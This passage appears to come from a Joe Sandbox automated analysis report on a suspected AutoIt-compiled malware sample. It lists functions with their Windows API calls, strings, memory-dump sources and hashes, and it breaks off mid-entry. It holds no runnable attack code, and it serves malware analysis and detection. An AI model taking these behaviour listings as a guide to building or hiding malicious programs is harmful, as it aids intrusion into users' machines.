                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B40
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B61
                                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B83
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Control Panel\Mouse
                                                                                                            • API String ID: 3677997916-824357125
                                                                                                            • Opcode ID: faa889901fb45b982939dc95df2a7ef2b8029dc0160bd095cc069267f8ee2ba6
                                                                                                            • Instruction ID: 103a213d17e48d4e1fd26c8c602fffca44308e9cae263f0d6f79637a1f2b9718
                                                                                                            • Opcode Fuzzy Hash: faa889901fb45b982939dc95df2a7ef2b8029dc0160bd095cc069267f8ee2ba6
                                                                                                            • Instruction Fuzzy Hash: 381118B5520218FFDF208FA5DC84AAEB7A8EF04785B144459EC05D7210D6319E459770
                                                                                                            Function 00D53923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D933A2
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D53A04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                            • String ID: Line:
                                                                                                            • API String ID: 2289894680-1585850449
                                                                                                            • Opcode ID: d7d922a270155918b419fdb253065ad60f5c0365d845074477bb7cfcd7352188
                                                                                                            • Instruction ID: e73b3a40c4a7ceb96b9e537db4571c0f04f6f89f150959f2f1d400002fb9b2a8
                                                                                                            • Opcode Fuzzy Hash: d7d922a270155918b419fdb253065ad60f5c0365d845074477bb7cfcd7352188
                                                                                                            • Instruction Fuzzy Hash: A431CDB1408344AADB21EB24D845BEAB7D8EB50351F04496AFD9993091EB709B4DCBB2
                                                                                                            Function 00D52DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00D92C8C
                                                                                                              • Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2
                                                                                                              • Part of subcall function 00D52DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D52DC4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                                            • String ID: X$`e
                                                                                                            • API String ID: 779396738-4036142377
                                                                                                            • Opcode ID: 18e2b5379a5501033f2761b551b560a81d672e30bd309dcdd46e200065bd4b64
                                                                                                            • Instruction ID: eebbad8db122f4783ee7f6431d085ce0861056f1645617ddb87c63a649b44b0c
                                                                                                            • Opcode Fuzzy Hash: 18e2b5379a5501033f2761b551b560a81d672e30bd309dcdd46e200065bd4b64
                                                                                                            • Instruction Fuzzy Hash: 79218471A002989EDF01EF94C8457EE7BB9EF49315F004059E845B7241EBB4968D8B71
                                                                                                            Function 00D6FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00D70668
                                                                                                              • Part of subcall function 00D732A4: RaiseException.KERNEL32(?,?,?,00D7068A,?,00E21444,?,?,?,?,?,?,00D7068A,00D51129,00E18738,00D51129), ref: 00D73304
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00D70685
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID: Unknown exception
                                                                                                            • API String ID: 3476068407-410509341
                                                                                                            • Opcode ID: a02e2359308b8f26dbdd6e220fcd854465d4af24438dbe760ff90c502900ac82
                                                                                                            • Instruction ID: 2949df3a684db64f5863bf12836ce2d9a5c173c282a5c7805c4a2768cbc45478
                                                                                                            • Opcode Fuzzy Hash: a02e2359308b8f26dbdd6e220fcd854465d4af24438dbe760ff90c502900ac82
                                                                                                            • Instruction Fuzzy Hash: 35F04934900709B7CB00BAA4E856C9E7B6C9E40350B648575B92C965D2FF71EA658AB0
                                                                                                            Function 015D6D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 015D6D75
                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 015D6D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CreateExit
                                                                                                            • String ID: D
                                                                                                            • API String ID: 126409537-2746444292
                                                                                                            • Opcode ID: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
                                                                                                            • Instruction ID: 420442f2b5d5cd02aaa41c1c7c4fd5e43f18de20eab49b242f28b7cd82a296e5
                                                                                                            • Opcode Fuzzy Hash: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
                                                                                                            • Instruction Fuzzy Hash: 49F0ECB154024DABDB60EFE4CC49FEE777CBF44701F008909FA0A9A180DA7496488B61
                                                                                                            Function 00DC3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DC302F
                                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DC3044
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Temp$FileNamePath
                                                                                                            • String ID: aut
                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                            • Opcode ID: b9d2f139e64f7d02acce33dbb9077bfd52e353440481ab42ee346033b049f4f4
                                                                                                            • Instruction ID: f791fd0a453f6366947d57bd08361d29b26add7aa411691c881161aff3d85329
                                                                                                            • Opcode Fuzzy Hash: b9d2f139e64f7d02acce33dbb9077bfd52e353440481ab42ee346033b049f4f4
                                                                                                            • Instruction Fuzzy Hash: E0D05E7290032867DA20A7A4AC4EFCB3A6CEB05751F0002A1BB55E6191DAB09985CAE4
                                                                                                            Function 00DD7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DD82F5
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00DD82FC
                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DD84DD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 146820519-0
                                                                                                            • Opcode ID: c4a362f107e7467c1db82e515fdcfcb7741687b2389397f52abdefde0d1d670a
                                                                                                            • Instruction ID: 9bcd41cc0709b4441045ae62f1528fb854da59e1c89fd189968f1efa20d83baf
                                                                                                            • Opcode Fuzzy Hash: c4a362f107e7467c1db82e515fdcfcb7741687b2389397f52abdefde0d1d670a
                                                                                                            • Instruction Fuzzy Hash: 56125B719083419FC715DF28C484B2ABBE5FF85314F18895EE8998B352DB31ED45CBA2
                                                                                                            Function 00D85AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7a8811b7a58717764bf40931b834908147c8c287f9d05fefd9c9f666f5dc0a6d
                                                                                                            • Instruction ID: 5eff3a55d355078509554151c9faadcc1fb424d58b02244d40e3e85e73745f2c
                                                                                                            • Opcode Fuzzy Hash: 7a8811b7a58717764bf40931b834908147c8c287f9d05fefd9c9f666f5dc0a6d
                                                                                                            • Instruction Fuzzy Hash: 75519E75E00609AFDB21BFA9E945FEEBBB8EF15310F18005AF405A7296D7319A01CB71
                                                                                                            Function 00D510F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
                                                                                                              • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D51BFC
                                                                                                              • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D51C07
                                                                                                              • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D51C12
                                                                                                              • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
                                                                                                              • Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D51C22
                                                                                                              • Part of subcall function 00D51B4A: RegisterWindowMessageW.USER32(00000004,?,00D512C4), ref: 00D51BA2
                                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D5136A
                                                                                                            • OleInitialize.OLE32 ref: 00D51388
                                                                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00D924AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1986988660-0
                                                                                                            • Opcode ID: 14865e2dc82d3be4af5e2d59016c3a1f75a6cb857f2eba76256fa8572801c961
                                                                                                            • Instruction ID: 6452d037f163ff5c0500c15fd269afc05e407e40a53c24a59f79952faa129853
                                                                                                            • Opcode Fuzzy Hash: 14865e2dc82d3be4af5e2d59016c3a1f75a6cb857f2eba76256fa8572801c961
                                                                                                            • Instruction Fuzzy Hash: 1571CEB49513548EC7A8EF7BAC816543BE0FBA834135452FAD81AE7361EB30460BCF61
                                                                                                            Function 00DBC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D53A04
                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DBC259
                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00DBC261
                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DBC270
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                            • String ID:
                                                                                                            • API String ID: 3500052701-0
                                                                                                            • Opcode ID: 9a120a88b9b73ee63daec67b009c0d961dea43a4931b400946f465c8844a9c54
                                                                                                            • Instruction ID: 31fe3cdf87f5b5fb811ec7575d2209cff45a688f473c9bb0e1c604c4df41107b
                                                                                                            • Opcode Fuzzy Hash: 9a120a88b9b73ee63daec67b009c0d961dea43a4931b400946f465c8844a9c54
                                                                                                            • Instruction Fuzzy Hash: 9431C370914384EFEB32DF648895BE7BBECAB06308F04149ED5DAA7241C3745A89CB65
                                                                                                            Function 00D886AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,00D885CC,?,00E18CC8,0000000C), ref: 00D88704
                                                                                                            • GetLastError.KERNEL32(?,00D885CC,?,00E18CC8,0000000C), ref: 00D8870E
                                                                                                            • __dosmaperr.LIBCMT ref: 00D88739
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2583163307-0
                                                                                                            • Opcode ID: 37667cb66a4122699a44e9e0195eab9e589df32c46f11adaf9d487a6c92f5145
                                                                                                            • Instruction ID: 24977514ed44cba389bb692f5ae088b289fdc2ec480d775e21386cee2ffa3260
                                                                                                            • Opcode Fuzzy Hash: 37667cb66a4122699a44e9e0195eab9e589df32c46f11adaf9d487a6c92f5145
                                                                                                            • Instruction Fuzzy Hash: 4C012636A056603AD6357334B846B7E67598B82774F7D0119F818DB1D3EEA1DC82A3B0
                                                                                                            Function 00D5DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • TranslateMessage.USER32(?), ref: 00D5DB7B
                                                                                                            • DispatchMessageW.USER32(?), ref: 00D5DB89
                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D5DB9F
                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00D5DBB1
                                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00DA1CC9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3288985973-0
                                                                                                            • Opcode ID: 7bddd8c46f746aa2b8f9d19021201b8be199dd98609c474d7c5f3fb4db680a35
                                                                                                            • Instruction ID: 729bfffeb020d6539bb2428a248cbc404e4c94aa805ee4917fd1828e3118c7f2
                                                                                                            • Opcode Fuzzy Hash: 7bddd8c46f746aa2b8f9d19021201b8be199dd98609c474d7c5f3fb4db680a35
                                                                                                            • Instruction Fuzzy Hash: AAF05E306143809BEB34DBA08C89FAA73BAEB85311F144928EA4AD70C0DB30958DCB35
                                                                                                            Function 00DC2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DC2CD4,?,?,?,00000004,00000001), ref: 00DC2FF2
                                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DC2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC3006
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00DC2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC300D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 3397143404-0
                                                                                                            • Opcode ID: 8af633804caa6293e633edee2c063279c370ef987ee77e4587902a383ce3d033
                                                                                                            • Instruction ID: 2502be9af7cfc28568ff845b9b14b99a8a909df65b0c31e3b3c1e6d832d237dd
                                                                                                            • Opcode Fuzzy Hash: 8af633804caa6293e633edee2c063279c370ef987ee77e4587902a383ce3d033
                                                                                                            • Instruction Fuzzy Hash: A6E0863269035077D2302755BC4DF8B3E1CDB86B71F104214FB19BA1D046A0150252B8
                                                                                                            Function 00D61310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00D617F6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID: CALL
                                                                                                            • API String ID: 1385522511-4196123274
                                                                                                            • Opcode ID: 22a4b8de83364fce16a7a89fbe43588bd2b9bc2a8585b2ca26df262f1e5bf1e5
                                                                                                            • Instruction ID: 812de04ce339e54d727c8ff13ddd947a26524146386c1bb702349db9b33265b0
                                                                                                            • Opcode Fuzzy Hash: 22a4b8de83364fce16a7a89fbe43588bd2b9bc2a8585b2ca26df262f1e5bf1e5
                                                                                                            • Instruction Fuzzy Hash: 3E224878608241DFC714DF24C490A2ABBF1FF89314F1C895DF5968B2A2D771E945CBA2
                                                                                                            Function 00DC6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00DC6F6B
                                                                                                              • Part of subcall function 00D54ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EFD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad_wcslen
                                                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                            • API String ID: 3312870042-2806939583
                                                                                                            • Opcode ID: e6b243bbc59c12d291bb2c26f29d1fe53fabb9556934d383d9015f697d95f68f
                                                                                                            • Instruction ID: 23bfc15971c7d1375d97d6a57c5ad97354a8e9544f77f12e46744c47e2462780
